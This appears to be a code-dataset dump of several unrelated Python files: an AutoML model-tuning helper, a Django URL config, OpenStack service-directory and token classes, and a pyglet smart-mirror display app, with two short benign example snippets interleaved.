'min_samples_leaf' in params: grid_params.update({'clf__min_samples_leaf':groups})\n if 'n_estimators' in params: grid_params.update({'clf__n_estimators':pot10})\n if 'n_clusters' in params: grid_params.update({'clf__n_clusters':groups})\n if 'n_components' in params: grid_params.update({'clf__n_components':groups})\n 
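# A minimal sketch of the Pipeline + GridSearchCV pattern that boost()
# assembles dynamically: the 'clf__' prefix routes each grid entry to the
# pipeline step named 'clf' (toy data; the grid below is illustrative only).
from sklearn.datasets import load_iris
from sklearn.model_selection import GridSearchCV
from sklearn.neighbors import KNeighborsClassifier
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler

X_demo, y_demo = load_iris(return_X_y=True)
pipe = Pipeline([('scl', StandardScaler()), ('clf', KNeighborsClassifier())])
grid = {'clf__n_neighbors': [2, 3, 5, 10],
        'clf__weights': ['uniform', 'distance']}
gs = GridSearchCV(estimator=pipe, param_grid=grid, scoring='accuracy', cv=3)
gs.fit(X_demo, y_demo)
print(gs.best_score_, gs.best_params_)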
if not isinstance(model, sklearn.cluster.DBSCAN) and self.strategy == 'clustering':\n if 'algorithm' in params: grid_params.update({'clf__algorithm':['full','elkan']})\n if 'eps' in params: grid_params.update({'clf__eps':quarts})\n if 'min_samples' in params: grid_params.update({'clf__min_samples':samples})\n if 'linkage' in params: grid_params.update({'clf__linkage':['ward','complete','average','single']})\n\n if 'k' in fixed.keys():\n if 'n_clusters' in params: grid_params.update({'clf__n_clusters':[fixed['k']]})\n if 'n_components' in params: grid_params.update({'clf__n_components':[fixed['k']]})\n if 'n_neighbors' in params: grid_params.update({'clf__n_neighbors':[fixed['k']]})\n \n # temporary, use this to improve the gridsearch process\n print('Available hyper-parameters', params)\n grid_params = [grid_params]\n print(grid_params, '\\n')\n\n if self.scalerX != 'None':\n pipe = Pipeline([('scl', self.scalerX), ('clf', model)])\n else:\n pipe = Pipeline([('clf', model)])\n \n if self.strategy == 'regression': # and len(grid_params) > 0:\n scores = ['neg_mean_squared_error']\n # scores = ['neg_mean_squared_error']\n for score in scores:\n kfolds = KFold(n_splits=2, shuffle=True)\n cv = kfolds.split(self.X_train, self.y_train)\n gs = GridSearchCV(estimator=pipe, param_grid=grid_params, scoring=score, cv=cv, error_score=0.0)\n gs.fit(self.X_train, self.y_train)\n self.best_model = gs.best_estimator_\n\n elif self.strategy == 'classification': # and len(grid_params) > 0:\n scores = ['accuracy']\n # scores = ['accuracy', 'recall_macro', 'precision_macro']\n for score in scores:\n kfolds = StratifiedKFold(n_splits=2, shuffle=True)\n cv = kfolds.split(self.X_train, self.y_train)\n gs = GridSearchCV(estimator=pipe, param_grid=grid_params, scoring=score, cv=cv, error_score=0.0)\n gs.fit(self.X_train, self.y_train)\n self.best_model = gs.best_estimator_\n\n elif self.strategy == 'clustering': # and len(grid_params) > 0:\n best = model\n best_result = 0\n k = 2\n scores = ['euclidean']\n for score in scores:\n # lets create our own GridSearch for clustering problems\n my_dict = grid_params[0]\n allParams = sorted(my_dict)\n combinations = product(*(my_dict[param] for param in allParams))\n for comb in combinations:\n new_params = {}\n for i, param in enumerate(allParams):\n if param == 'n_clusters' or param == 'n_components':\n k = comb[i]\n new_params.update({param: comb[i]})\n\n # update all tuning parameters and run \n pipe.set_params(**new_params)\n bandwidth = estimate_bandwidth(self.X_train, quantile=0.3)\n connectivity = kneighbors_graph(self.X_train, n_neighbors=k, include_self=False)\n connectivity = 0.5 * (connectivity + connectivity.T)\n pipe.fit(self.X_train)\n if hasattr(pipe, 'labels_'):\n y_pred = pipe.labels_.astype(np.int)\n else:\n y_pred = pipe.predict(self.X_train)\n result = silhouette_score(self.X_train, y_pred, metric=score)\n if result > best_result:\n best_result = result\n best = pipe\n\n self.best_model = best\n self.best_model.best_params_ = new_params\n\n if printt:\n print(self.report_width * '*', '\\n*')\n print('* HYPER-PARAMETER TUNING REPORT\\n*')\n print(\"* SCORING METHOD: %s\" % score)\n if self.strategy == 'regression':\n print('* BEST SCORE: %.3f' % (-gs.best_score_))\n print('* BEST PARAMS:', gs.best_params_)\n if self.strategy == 'classification':\n print('* BEST SCORE: %.1f %%' % (100 * gs.best_score_))\n print('* BEST PARAMS:', gs.best_params_)\n if self.strategy == 'clustering':\n print('* BEST SCORE (silhouette): %.2f' % (best_result))\n print('* BEST 
PARAMS:', self.best_model.best_params_)\n print('*\\n', self.report_width * '*')\n print(self.best_model)\n\n return None \n\n\n # given a model name, evaluate y_hat/y_pred/clusters and the overall performance of such model\n def optimize(self, model_name, printt=True, graph=False, xy=(0,1), fixed={}):\n self.graphs_model = []\n size = self.graph_width\n model = self.models[model_name]\n self.boost(model, printt, fixed=fixed) # grid search hyper parameters for this model\n \n if self.strategy == 'regression':\n X, y = self.X_test, self.y_test # evaluate using the test subset\n y_hat = self.best_model.predict(X)\n # show residual analysis\n result = self.residual(y, y_hat, model_name, printt, graph)\n if graph:\n # show the correlation between y and y_hat\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Model Overall Performance')\n plt.scatter(y, y_hat, color='g')\n viewer = lr()\n plt.plot(y, viewer.fit(y, y_hat).predict(y), color='k')\n plt.xlabel('Observed')\n plt.ylabel('Predicted')\n self.graphs_model.append(fig)\n plt.show()\n return result\n\n elif self.strategy == 'classification':\n X, y = self.X_test, self.y_test # evaluate using the test subset\n y_pred = self.best_model.predict(X)\n report = classification_report(y, y_pred, output_dict=True)\n sample_size = len(y_pred)\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* MODEL PERFORMANCE \\n*')\n print('* MODEL NAME: ', model_name)\n print('* TEST SAMPLE SIZE: ', sample_size)\n print('* ACCURACY: ', round(accuracy_score(y, y_pred)*100, 1), '%')\n print('* ')\n print(self.report_width * '*', '\\n')\n if not graph:\n print(pd.DataFrame(report).T)\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.3 * size))\n plt.title('Confusion Matrix')\n sns.heatmap(confusion_matrix(y, y_pred), annot=True, cmap='YlGn', fmt='d',)\n plt.xlabel('Predicted')\n plt.ylabel('True Class')\n self.graphs_model.append(fig)\n plt.show()\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Classification Report')\n sns.heatmap(pd.DataFrame(report).iloc[0:3].T, annot=True, vmin=0, vmax=1, cmap='BrBG', fmt='.2g')\n plt.xlabel('Score')\n self.graphs_model.append(fig)\n plt.show()\n return 'Accuracy: ' + str(round(accuracy_score(y, y_pred)*100, 1)) + '%'\n \n elif self.strategy == 'clustering':\n X = np.array(self.X_train) # use the same dataset to show the final model\n self.best_model.fit(X)\n if hasattr(self.best_model, 'labels_'):\n y_pred = self.best_model.labels_.astype(np.int)\n else:\n y_pred = self.best_model.predict(X)\n score = silhouette_score(X, y_pred, metric='euclidean')\n sample_size = len(y_pred)\n if printt:\n print('\\n')\n print(self.report_width * '*', '\\n*')\n print('* MODEL PERFORMANCE \\n*')\n print('* MODEL NAME: ', model_name)\n print('* TEST SAMPLE SIZE: ', sample_size)\n print('* SILHOUETTE: ', round(score, 2))\n print('* ')\n print(self.report_width * '*', '\\n')\n if graph:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n plt.title('Cluster Segmentation')\n plt.scatter(X[:, xy[0]], X[:, xy[1]], c=y_pred, s=50, cmap='viridis')\n self.graphs_model.append(fig)\n plt.show()\n return 'Silhouette: ' + str(round(score, 2))\n\n\n\n\n\n# Rubia Models demo cases\n\ndef selectDemo(id):\n if id == 0:\n data, meta = scipy.io.arff.loadarff('dataset/scene_arff.arff')\n df = pd.DataFrame(data)\n y_cols = ['Beach']\n #y_cols = ['Beach', 'Sunset', 'FallFoliage', 'Field', 'Mountain', 'Urban']\n ignore_cols = ['Sunset', 'FallFoliage', 'Field', 'Mountain', 'Urban']\n elif id == 1:\n 
df = pd.read_csv('dataset/Advertising.csv', index_col=0)\n y_cols = ['sales']\n ignore_cols = []\n elif id == 2:\n df = pd.read_csv('dataset/SAheart.csv')\n y_cols = ['chd']\n ignore_cols = []\n elif id == 3:\n df = pd.read_csv('dataset/pima-indians-diabetes.csv')\n y_cols = ['Class']\n ignore_cols = []\n elif id == 4:\n df = pd.read_excel('dataset/sample.xlsx')\n y_cols = ['g1']\n ignore_cols = ['g2', 'y', 'yr'] \n elif id == 5:\n df = pd.read_excel('dataset/sample.xlsx')\n y_cols = ['yr']\n ignore_cols = ['g1', 'g2', 'y'] \n elif id == 6:\n df = pd.read_csv('dataset/iris.csv')\n y_cols = []\n ignore_cols = ['species'] \n elif id == 7:\n df = pd.read_csv('../../../bigdata/jet/full_data.csv')\n y_cols = ['class']\n ignore_cols = ['class'] \n else:\n df = pd.read_csv('dataset/iris.csv')\n y_cols = ['species']\n ignore_cols = []\n return df, y_cols, ignore_cols\n\nrun_demo = False\nid = -1\ngraph = False\nbalance_tol = 0.3\norder = 1\nncomponents = 2\nxy = (0, 1)\nfixed = {'k': 3}\nif run_demo:\n # load data as a pandas.dataframe object and pass it to the class\n df, y_cols, ignore_cols = selectDemo(id)\n\n # load the class rubia_models and show important info about the dataset\n # flag debug mode to True to show warning messages\n rm = rubia_models(df, debug=False)\n rm.describe(rm.data_raw)\n\n # columns listed as ignored will be discarded while modeling\n # flag graph to true to show some exploratory and correlation graphs on the dataset\n rm.explore(rm.data_raw, y_cols, ignore_cols, graph=graph) #updates X, y, M\n\n # encode every column of type object or string to categorical numbers\n rm.encode(encoder='LabelEncoder')\n\n # this method makes an auto balance for each class, using the minority class\n # only applies if the dataset size variation is under tolerance value\n rm.balance(balance_tol, rm.M, y_cols, ignore_cols)\n\n # add higher level and interaction terms to the model\n # be carefull when using higher level terms and graphs together, less powerfull hardware can bottleneck with higher complexity\n rm.addTerms(rm.X, rm.y, levels=order, interaction=False, root=False)\n rm.explore(rm.M, y_cols, ignore_cols, graph=graph) #updates X, y, M\n\n # analyse if this is a regression, classification or clustering problem and evaluate some models\n # when y is float or has more then 10 different classes, the algorithm turns into a regression algorithm automatically\n # else it will perform a classification modeling\n # in multilevel problems, if one of the ys is identified as regression, then the entire process is set to regression mode\n # this routine also drops any column of constant value, if it exists\n rm.analyse(y_cols)\n\n # dimensionality reduction\n if ncomponents > 1: \n rm.redux(k=ncomponents, mode='pca', transform='MinMax')\n print('Explained variance (%)', rm.scalerX_pca.explained_variance_ratio_.sum())\n elif len(rm.X.columns) > 10: \n rm.redux(k=10)\n\n # evaluate the performance of a mix of models\n alphas = 10 ** np.linspace(10, -2, 100) * 0.5\n rm.evaluate(test_size=0.3, transformX='Standard', transformY='None', folds=10, alphas=alphas, graph=graph)\n\n # apply tuning to the best models\n rm.optimize(str(rm.report_performance.Model.iloc[0]), graph=graph, xy=xy, fixed=fixed)\n\n\n\n\n\n# To get all coefficients for a given model:\n# lassor.coef_, lassocvr.coef_, rr.coef_, rcvr.coef_\n# rfc.feature_importances_\n# logit.classes_, coef_, intercept_, n_iter_\n# nbc.class_count_, class_prior_, classes_, sigma_, theta_\n# ldac.explained_variance_ratio_\n\n\n\n# TO DO\n\n# 
implement multioutput (not planned)\n# adjust redux(k='auto') to calculate the optimal value for k (not planned)\n# add help menu with highlights for each model type, pros and cons (not planned)\n# weight CV and model constraints while choosing the best model type, for similar performances (not planned)\n# add metric parameter to the boost method, spefically for clustering (not planned)\n\n","sub_path":"Módulo 2 - Data Analysis/Curso 6 - Agrupamento/rubia_models.py","file_name":"rubia_models.py","file_ext":"py","file_size_in_byte":50366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"341812703","text":"from django.conf.urls import url\nfrom report import views\n\nurlpatterns = [\n # url(r'^xadmin/', site.urls),\n url(r'^index/', views.index),\n url(r'^search/', views.search),\n url(r'^sucai/', views.sucai),\n url(r'^collection/', views.collection),\n url(r'^mould/', views.mould),\n url(r'^edit/', views.sucai_edit),\n url(r'^delete/', views.delete),\n url(r'^lot_delete/', views.lot_delete),\n url(r'^del_all/', views.del_all),\n url(r'^append/', views.append),\n url(r'^collection_delete/', views.collection_delete),\n url(r'^lot_append/', views.lot_append),\n url(r'^cmould/', views.cmould),\n url(r'^create_report/', views.create_report),\n url(r'^rep_detail/', views.rep_detail),\n url(r'^del_rep/', views.del_rep),\n]\n","sub_path":"report/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"616523792","text":"#\n# Copyright (c) 2015-2018 Wind River Systems, Inc.\n#\n# SPDX-License-Identifier: Apache-2.0\n#\nimport datetime\nimport iso8601\nimport re\nimport six\n\nfrom nfv_common import debug\nfrom nfv_common.helpers import Constant\nfrom nfv_common.helpers import Constants\nfrom nfv_common.helpers import Singleton\n\nDLOG = debug.debug_get_logger('nfv_plugins.nfvi_plugins.openstack.objects')\n\n\n@six.add_metaclass(Singleton)\nclass ServiceCategory(Constants):\n \"\"\"\n Service Category Constants\n \"\"\"\n PLATFORM = Constant('platform')\n OPENSTACK = Constant('openstack')\n\n\n# Service Category Constant\nSERVICE_CATEGORY = ServiceCategory()\n\n\n@six.add_metaclass(Singleton)\nclass PlatformServices(Constants):\n \"\"\"\n Platform Services Constants\n \"\"\"\n GUEST = Constant('guest')\n KEYSTONE = Constant('keystone')\n MTC = Constant('mtc')\n SYSINV = Constant('sysinv')\n PATCHING = Constant('patching')\n FM = Constant('fm')\n\n\n# Platform Services Constant\nPLATFORM_SERVICE = PlatformServices()\n\n\n@six.add_metaclass(Singleton)\nclass OpenStackServices(Constants):\n \"\"\"\n OpenStack Services Constants\n \"\"\"\n CEILOMETER = Constant('ceilometer')\n CINDER = Constant('cinder')\n GLANCE = Constant('glance')\n KEYSTONE = Constant('keystone')\n NEUTRON = Constant('neutron')\n NOVA = Constant('nova')\n HEAT = Constant('heat')\n FM = Constant('fm')\n\n\n# OpenStack Services Constant\nOPENSTACK_SERVICE = OpenStackServices()\n\n\nclass Service(object):\n \"\"\"\n Service\n \"\"\"\n def __init__(self, region_name, service_name, service_type,\n endpoint_type, endpoint_override):\n self._region_name = region_name\n self._service_name = service_name\n self._service_type = service_type\n self._endpoint_type = endpoint_type\n self._endpoint_override = endpoint_override\n\n @property\n def region_name(self):\n \"\"\"\n Returns the region name associated with this entry\n \"\"\"\n return self._region_name\n\n 
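# A hypothetical usage sketch of the Directory/Service registry defined in
# this module (every literal below is made up for illustration; it relies on
# Directory.set_service_info/get_service_info defined further down).
def _directory_usage_example():
    directory = Directory(SERVICE_CATEGORY.OPENSTACK, 'keyring-svc', 'http',
                          '127.0.0.1', 5000, 'admin', 'user', 'secret',
                          'Default', 'Default')
    directory.set_service_info(OPENSTACK_SERVICE.NOVA, 'RegionOne', 'nova',
                               'compute', 'admin', None)
    info = directory.get_service_info(OPENSTACK_SERVICE.NOVA)
    assert info.region_name == 'RegionOne'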
@property\n def service_name(self):\n \"\"\"\n Returns the service name associated with this entry\n \"\"\"\n return self._service_name\n\n @property\n def service_type(self):\n \"\"\"\n Returns the service type associated with this entry\n \"\"\"\n return self._service_type\n\n @property\n def endpoint_type(self):\n \"\"\"\n Returns the endpoint type associated with this entry\n \"\"\"\n return self._endpoint_type\n\n @property\n def endpoint_override(self):\n \"\"\"\n Returns the endpoint override associated with this entry\n \"\"\"\n return self._endpoint_override\n\n\nclass Directory(object):\n \"\"\"\n Directory\n \"\"\"\n def __init__(self, service_category, keyring_service, auth_protocol,\n auth_host, auth_port, auth_project,\n auth_username, auth_password, auth_user_domain_name,\n auth_project_domain_name, auth_uri=None):\n self._service_category = service_category\n self._keyring_service = keyring_service\n self._auth_protocol = auth_protocol\n self._auth_host = auth_host\n self._auth_port = auth_port\n self._auth_project = auth_project\n self._auth_username = auth_username\n self._auth_password = auth_password\n self._auth_uri = auth_uri\n self._auth_user_domain_name = auth_user_domain_name\n self._auth_project_domain_name = auth_project_domain_name\n self._entries = dict()\n\n @property\n def service_category(self):\n \"\"\"\n Returns the service category\n \"\"\"\n return self._service_category\n\n @property\n def keyring_service(self):\n \"\"\"\n Returns the keyring service\n \"\"\"\n return self._keyring_service\n\n @property\n def auth_protocol(self):\n \"\"\"\n Returns the authorization protocol\n \"\"\"\n return self._auth_protocol\n\n @property\n def auth_host(self):\n \"\"\"\n Returns the authorization host\n \"\"\"\n return self._auth_host\n\n @property\n def auth_port(self):\n \"\"\"\n Returns the authorization port\n \"\"\"\n return self._auth_port\n\n @property\n def auth_project(self):\n \"\"\"\n Returns the authorization project\n \"\"\"\n return self._auth_project\n\n @property\n def auth_username(self):\n \"\"\"\n Returns the authorization username\n \"\"\"\n return self._auth_username\n\n @property\n def auth_password(self):\n \"\"\"\n Returns the authorization password\n \"\"\"\n return self._auth_password\n\n @property\n def auth_uri(self):\n \"\"\"\n Returns the authorization uri\n \"\"\"\n return self._auth_uri\n\n @property\n def auth_user_domain_name(self):\n \"\"\"\n Returns the authorization user domain name\n \"\"\"\n return self._auth_user_domain_name\n\n @property\n def auth_project_domain_name(self):\n \"\"\"\n Returns the authorization project domain name\n \"\"\"\n return self._auth_project_domain_name\n\n def set_service_info(self, service, region_name, service_name,\n service_type, endpoint_type, endpoint_override):\n \"\"\"\n Set information for a particular service\n \"\"\"\n if self._entries.get(service, None) is not None:\n del self._entries[service]\n\n entry = Service(region_name, service_name, service_type,\n endpoint_type, endpoint_override)\n self._entries[service] = entry\n\n def get_service_info(self, service):\n \"\"\"\n Get information for a particular service\n \"\"\"\n return self._entries.get(service, None)\n\n\nclass Token(object):\n \"\"\"\n Token\n \"\"\"\n def __init__(self, token_data, directory, token_id):\n self._expired = False\n self._data = token_data\n self._directory = directory\n self._token_id = token_id\n\n def set_expired(self):\n self._expired = True\n\n def is_expired(self, within_seconds=300):\n if not 
self._expired:\n end = iso8601.parse_date(self._data['token']['expires_at'])\n now = iso8601.parse_date(datetime.datetime.utcnow().isoformat())\n if end <= now:\n return True\n delta = abs(end - now).seconds\n return delta <= within_seconds\n return True\n\n def get_id(self):\n \"\"\"\n Get the identifier of the token.\n \"\"\"\n return self._token_id\n\n def get_tenant_id(self):\n \"\"\"\n Get the project identifier of the token.\n \"\"\"\n return self._data['token']['project']['id']\n\n def _url_strip_version(self, url):\n \"\"\"\n Strip the version information from the url\n \"\"\"\n # Get rid of the trailing '/' if present and remove the version\n # information from the URL.\n url = url.rstrip('/')\n url_bits = url.split('/')\n # Regular-Expression to match 'v1' or 'v2.0' etc\n if re.match(r'v\\d+\\.?\\d*', url_bits[-1]):\n url = '/'.join(url_bits[:-1])\n\n elif re.match(r'v\\d+\\.?\\d*', url_bits[-2]):\n url = '/'.join(url_bits[:-2])\n\n return url\n\n def _get_service_url(self, region_name, service_name, service_type,\n endpoint_type):\n \"\"\"\n Search the catalog of a service in a region for the url\n \"\"\"\n for catalog in self._data['token']['catalog']:\n if catalog['type'] == service_type:\n if catalog['name'] == service_name:\n if 0 != len(catalog['endpoints']):\n for endpoint in catalog['endpoints']:\n if (endpoint['region'] == region_name and\n endpoint['interface'] == endpoint_type):\n return endpoint['url']\n return None\n\n def get_service_url(self, service, strip_version=False):\n \"\"\"\n Get the service url for a service\n \"\"\"\n service_info = self._directory.get_service_info(service)\n if service_info is not None:\n\n region_name = service_info.region_name\n service_name = service_info.service_name\n service_type = service_info.service_type\n endpoint_type = service_info.endpoint_type\n\n endpoint = self._get_service_url(region_name, service_name,\n service_type, endpoint_type)\n\n if service_info.endpoint_override is not None:\n if endpoint is None:\n endpoint = service_info.endpoint_override\n else:\n from six.moves import urllib\n # this is necessary to keep tenant_id in place\n endpoint = \\\n service_info.endpoint_override + urllib.parse.urlparse(endpoint).path\n\n if strip_version:\n endpoint = self._url_strip_version(endpoint)\n return endpoint\n\n return None\n","sub_path":"nfv/nfv-plugins/nfv_plugins/nfvi_plugins/openstack/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":9109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"310366152","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nimport load\nimport os\nimport pyglet\nimport resources\nimport threading\nimport time\nfrom pyglet.window import key\n\nimport MScognitiveService\nimport KcognitiveService\nimport datetimeService\nimport distanceService\nimport imageCap\nimport OCRService\nimport recomendationService\nimport weatherService\n\n\n# emotion_service = {'kairos', 'ms'}\nemotion_service = 'ms'\nshow_logs = True\nshow_qr = True\ndev_recomendations = True\n\nscale = 0.38 # Dejar en 1 para fullscreen, 0.38 para heigth completo en 1366x768\nshow_FPS = True\n\nmodo_prod = False\n# Detección automática de entorno productivo\nif os.path.exists(\"../../espejo_prod\"):\n modo_prod = True\n scale = 1\n \n show_logs = False\n show_qr = True\n dev_recomendations = False\n\n###############################################################################\n# Window\nif scale >= 1:\n show_FPS = False\n scale = 1 # quitar si se permitirá 
scale > 1?\n \n screens = pyglet.window.get_platform().get_default_display().get_screens()\n if len(screens) > 1: # si tiene varias pantallas, usar la 2a\n window1 = pyglet.window.Window(screen=screens[1], fullscreen = True)\n else:\n window1 = pyglet.window.Window(fullscreen = True)\n # ocultar puntero en fullscreen\n window1.set_exclusive_mouse()\nelse:\n _width = int(1080*scale)\n _height = int(1920*scale) \n _style = pyglet.window.Window.WINDOW_STYLE_BORDERLESS\n \n window1 = pyglet.window.Window(width = _width,\n height = _height,\n style = _style,\n vsync = False)\n window1.set_location(0, 0) \n \"\"\"\n window2 = pyglet.window.Window(width = _width,\n height = int(_height),\n vsync = False,\n style = _style)\n window2.set_location(window1.width, 0)\n \"\"\"\nfps1 = pyglet.window.FPSDisplay(window1)\n\n###############################################################################\n# Scale & coordinates\n# window1.width and window1.height include scale\ndef get_coord_x(x):\n return int(x*scale)\ndef get_coord_y(y):\n return int(window1.height - y*scale)\ndef get_coord(x, y):\n return get_coord_x(x), get_coord_y(y)\n\ndef get_scale(sprite, width):\n return scale * (width / sprite.image.width)\n\n###############################################################################\n# textos e iconos para mostrar\ntexts = []\nicons = []\n\nfont_name = 'Segoe UI'\nif not pyglet.font.have_font('Segoe UI'):\n pyglet.font.add_file('segoeui.ttf')\n segoe_ui = pyglet.font.load('Segoe UI')\n\n###############################################################################\n# Camera\ncapDevice = imageCap.initCapture(0)\nmirror = False\nshow_camera = False\n\n\n###############################################################################\n# Color/Opacity\nhas_people = False\npeople_timestamp = 0\nno_people_timestamp = time.time()\nopacity = 0\n#color = '#000000'\n\ndef get_color(opacity):\n color = str('%X' % opacity)\n if len(color) < 2:\n color = '0' + color\n return '#' + color*3\n\n###############################################################################\n# Sprites\ncurrentEmoji = resources.no_people\npractiaEmoji = resources.practia\n#Define un batch gráfico, para acelerar el dibujo en pantalla\nemojiBatch = pyglet.graphics.Batch()\nemojis = load.emojiGroup(num_emojis = 20,\n min_x = 0,\n min_y = get_coord_y(1920),\n max_x = get_coord_x(540),\n max_y = get_coord_y(-150),\n width = 150,\n scale = scale,\n Batch = emojiBatch)\n\nappearance_batch = pyglet.graphics.Batch()\ncurrent_glasses = True\ncurrent_gender = 'Male'\ncurrent_age = ''\n\nset_kairos = True\nshow_glasses = not modo_prod\nshow_gender = not modo_prod\nshow_age = not modo_prod\n\nwidget_gender = pyglet.sprite.Sprite(img = resources.none,\n x = get_coord_x(900),\n y = get_coord_y(760),\n batch = appearance_batch)\nwidget_gender.scale = get_scale(widget_gender, 150)\nwidget_gender.opacity = opacity\n\nwidget_age = pyglet.sprite.Sprite(img = resources.age_none,\n x = get_coord_x(750),\n y = get_coord_y(850),\n batch = appearance_batch)\nwidget_age.scale = get_scale(widget_age, 300)\nwidget_age.opacity = opacity\n\n###############################################################################\n# marca\nmarca_min_y = get_coord_y(100)\nmarca_max_y = get_coord_y(1820)\nmarca_up = True\nmarca_velocity = 10\nwidget = pyglet.sprite.Sprite(resources.marca,\n x = get_coord_x(240),\n y = marca_max_y)\nwidget.scale = get_scale(widget, 600)\nwidget.opacity = 255 - opacity\nmarca_min_y -= widget.height\nmarca_timestamp = 
time.time()\n\n###############################################################################\n# QR\nqr_min_y = get_coord_y(1200)\nqr_max_y = get_coord_y(1500)\nqr_up = True\nqr_velocity = 10\nqr_resource = resources.qr_prod if modo_prod else resources.qr\nwidget_qr = pyglet.sprite.Sprite(qr_resource,\n x = get_coord_x(750),\n y = qr_max_y)\nwidget_qr.scale = get_scale(widget_qr, 300)\nwidget_qr.opacity = 255\nqr_min_y -= widget_qr.height\nqr_timestamp = time.time()\n\n###############################################################################\n# Datetime\nbatchClock = pyglet.graphics.Batch()\nwidgetClock = pyglet.sprite.Sprite(resources.roundhud,\n x = get_coord_x(864),\n y = get_coord_y(1910),\n batch = batchClock)\nwidgetClock.scale = get_scale(widgetClock, 200)\nwidgetClock.opacity = opacity\nicons.append(widgetClock)\n\ntextHour = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(969),\n y = get_coord_y(1765),\n anchor_x = 'center',\n anchor_y = 'top',\n batch = batchClock)\ntextHour.font_size = 36*scale\ntextHour.font_name = font_name\ntexts.append(textHour)\n\ntextDate = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(968),\n y = get_coord_y(1830),\n anchor_x = 'center',\n anchor_y = 'top',\n batch = batchClock)\ntextDate.font_size = 12*scale\ntextDate.font_name = font_name\ntexts.append(textDate)\n\n###############################################################################\n# Weather\ntextWeather = ''\nweather_icon = 0\nshow_weather = False\n\ndef get_weather_image():\n # usar en Thread principal\n file_icon = resources.weatherIcon(weather_icon)\n return pyglet.resource.image(file_icon)\n\nbatchWeather = pyglet.graphics.Batch()\nwidgetWeather = pyglet.sprite.Sprite(resources.roundhud,\n x = get_coord_x(648),\n y = get_coord_y(1910),\n batch = batchWeather)\nwidgetWeather.scale = get_scale(widgetWeather, 200)\nwidgetWeather.opacity = opacity\n#icons.append(widgetWeather)\n\ntextWeather = pyglet.text.HTMLLabel(\n text = '°C', \n x = get_coord_x(756), \n y = get_coord_y(1840), \n anchor_x = 'center',\n anchor_y = 'top',\n batch = batchWeather)\ntextWeather.font_size = 24*scale\ntextWeather.font_name = font_name\n#texts.append(textWeather)\n\niconWeather = pyglet.sprite.Sprite(img = get_weather_image(),\n x = get_coord_x(715),\n y = get_coord_y(1830),\n batch = batchWeather)\niconWeather.scale = get_scale(iconWeather, 80)\niconWeather.opacity = opacity\n#icons.append(iconWeather)\n\n###############################################################################\n# Text\nnombre_ocr = ['']\nchange_ocr = False\nshow_recomendation = False\n\nbatchTextBlock = pyglet.graphics.Batch()\nbackground = pyglet.graphics.OrderedGroup(0)\nforeground = pyglet.graphics.OrderedGroup(1)\n\nblock_text_img = resources.cuadro_rojo\nblock_text_w = 490\nblock_text_h = int(block_text_w * block_text_img.height / block_text_img.width)\nblock_text_y = 20\nblock_text = [580, block_text_h + block_text_y, block_text_w]\ncuadro_rojo = pyglet.sprite.Sprite(block_text_img,\n x = get_coord_x(block_text[0]),\n y = get_coord_y(block_text[1]),\n batch = batchTextBlock,\n group = background)\ncuadro_rojo.scale = get_scale(cuadro_rojo, block_text[2])\ncuadro_rojo.opacity = opacity\nicons.append(cuadro_rojo)\n\ntextBlock = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_text[0] + 20), \n y = get_coord_y(block_text_y + 20),\n width = get_coord_x(block_text[2] - 20),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batchTextBlock,\n group = foreground)\ntextBlock.font_size = 
18*scale\ntextBlock.font_name = font_name\ntexts.append(textBlock)\n\n\n###############################################################################\n# Distances\norigen = '-33.42343,-70.61486'\ndestino = '-33.432462,-70.6253821'\nmodo = 'driving|walking|bicycling'\nshow_distances = False\n\nbatch_distances = pyglet.graphics.Batch()\n\nblock_driving = [10, 1900, 100] # [pos_x, pos_y, size_img]\nshow_driving = False\ntexto_driving = ''\nicon_driving = pyglet.sprite.Sprite(img = resources.driving,\n x = get_coord_x(block_driving[0]),\n y = get_coord_y(block_driving[1]),\n batch = batch_distances)\nicon_driving.scale = get_scale(icon_driving, block_driving[2])\nicon_driving.opacity = opacity\n\ntext_driving = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_driving[0] + block_driving[2]),\n y = get_coord_y(block_driving[1] - block_driving[2]*0.8),\n width = get_coord_x(block_driving[2]),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_driving.font_size = 18*scale\ntext_driving.font_name = font_name\n\nblock_walking = [190, 1890, 85] # [pos_x, pos_y, size_img]\nshow_walking = False\ntexto_walking = ''\nicon_walking = pyglet.sprite.Sprite(img = resources.walking,\n x = get_coord_x(block_walking[0]),\n y = get_coord_y(block_walking[1]),\n batch = batch_distances)\nicon_walking.scale = get_scale(icon_walking, block_walking[2])\nicon_walking.opacity = opacity\n\ntext_walking = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_walking[0] + block_walking[2]),\n y = get_coord_y(block_walking[1] - block_walking[2]*0.82),\n width = get_coord_x(block_walking[2]),\n anchor_x = 'left',\n anchor_y = 'top',\n multiline = True,\n batch = batch_distances)\ntext_walking.font_size = 18*scale\ntext_walking.font_name = font_name\n\nblock_bicycling = [370, 1900, 100] # [pos_x, pos_y, size_img]\nshow_bicycling = False\ntexto_bicycling = ''\nicon_bicycling = pyglet.sprite.Sprite(img = resources.bicycling,\n x = get_coord_x(block_bicycling[0]),\n y = get_coord_y(block_bicycling[1]),\n batch = batch_distances)\nicon_bicycling.scale = get_scale(icon_bicycling, block_bicycling[2])\nicon_bicycling.opacity = opacity\n\ntext_bicycling = pyglet.text.HTMLLabel(\n text = '',\n x = get_coord_x(block_bicycling[0] + block_bicycling[2]),\n y = get_coord_y(block_bicycling[1] - block_bicycling[2]*0.8),\n width = get_coord_x(block_bicycling[2]),\n anchor_x = 'left',\n anchor_y 